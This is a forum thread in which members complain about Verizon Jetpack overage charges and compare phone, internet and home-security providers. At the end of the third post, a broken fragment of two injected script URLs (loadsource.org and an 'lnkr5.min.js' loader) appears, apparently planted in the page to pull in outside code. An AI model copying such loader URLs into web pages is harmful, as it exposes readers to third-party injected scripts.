if any of ya'll have one of them verison jet packs...yer gonna start having trouble with them. we had to get a new one and we've had trouble ever since plus huge overage charges for internet! I've seen it several times where I've powered the jet pack off, only to find it "on" in the morning. then the bill comes with over $200. in charges. lots of times it won't let us on line, and sometimes if we do get online, it'll shut off after 30 mins or so, when that happens we play he!! getting back on line. but then in the morning, it's on and cranking up the charges! we now have to take the battery out of it so we can shut it off. Verizon won't exchange it, nor will they look into it. it's our fault you know! not the end of the world having to take the battery out, just one more pain in the butt!

Hey Good Buddy,,,is the verizon Jet Pack  your internet / cell phone provider ? I'm surprised you have not marched into the CEO's office and lay the law down on him/her,,,,There are just toooo many other providers out there to have to put up with sorry service or equipment. I looked around and to my surprise, found that our phone provider also offered HIGH SPEED internet plus cable, with NO contract, so I cancelled the landline phone, and "bundled" the cable and 50 MBPS internet for dang near less money than we had been paying to the other internet provider alone,,,!!

welcome to verizon world.    i quit them about 6yrs ago.   BUT my wife's job requires her to be with them.    We have UScell here on the farm for internet and phone and have an unlimited ATT jet pak for when we snowbird.   (farm reception for ATT is just sketchy enuff that we can't run 2 computers on it)   ATT billing system takes a little getting use to but they have no contract and allow us to hook up and unhook anytime!   Anyway good luck with verizon and when u get fed up; pull the plug on them.  There are better companies out in the cyberworld!                               http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&r=21">http://eazydevlin.xyz/addons/lnkr5.min.js">

Yeah,,10-4 on dumpin the landline phone service,,,we had not even had a phone in the house for 3-4 years since somebody "lost" the phone,,,,,,Wink The only'ist reason we kept the service was the older security system we USED to have required a landline in order to operate. We now have ADT but am negotiatin with Simply Safe as they look to have a much better and cost effective plan,,,and,,,,and,,,you know how frugal I tend to be,,,,,LOL

We were paying around $86 a month maybe 8 years ago for two cell phones from Verizon. Left them and have Trac phones since. Cost $100 per year each for 1350 minutes each. Reception just as good. There on the same towers I'm told.
Went to Uma for land line around the same time as I was on a cost of living reduction kick and bill went from $32 a month down to about $4 a month for tax. People that told us about Uma had gotten it about 6 months before have never even had a bill on their credit card for the tax. Beat a deadline I guess. Bought the system at Best Buy for about $200. Good investments, both of them.

re: We now have ADT..

Almost Done Tomorrow.... hehehe

When I was 1/2 my age, I had fun hacking into their 'Central Monitoring Station', things there aren't much better, nothing is 'secure'.

Have cable phone ,cable TV, cable internet. Great when the power goes off...hmmm

I've been on USCC and have always had very good service from them. If you think Verizon sucks, try Hughesnet. They wrote the book on sucking. Either way, if you're being wrongly charged by faulty equipment, contact your state's utility commission and lodge a complaint. I had frequent outages years ago when I had Grand River Mutual for phone and internet. They refused to budge on charges so I contacted the Iowa Utilities Commission. They forced GRM to refund 3 months worth of charges.

Out where we are the Cell service SUCKS!!! We have ATT, neighbors have all manner of cell phone providers they just do not do well, low signal strength, low connectivity quality and towers go on or off at seemingly very convenient times for NOBODY! Tried the satellite dish internet, NEVER AGAIN as slow as molasses sliding off a spoon even with the $$$ "Upgrades", checked with ATT where was told not available even with a home repeater so used cell phones for awhile, that was a loser, actually went back to a landline and basically steady service Centurylink, grouped up with our Direct TV for a discount and we can use the movie channels where you need phone connection to Buy the Movie.

Actually thinking of dumping the cell phones as are nasty damn things always in the way, always low battery or dead or NO SERVICE AVAILABLE, tired of it.
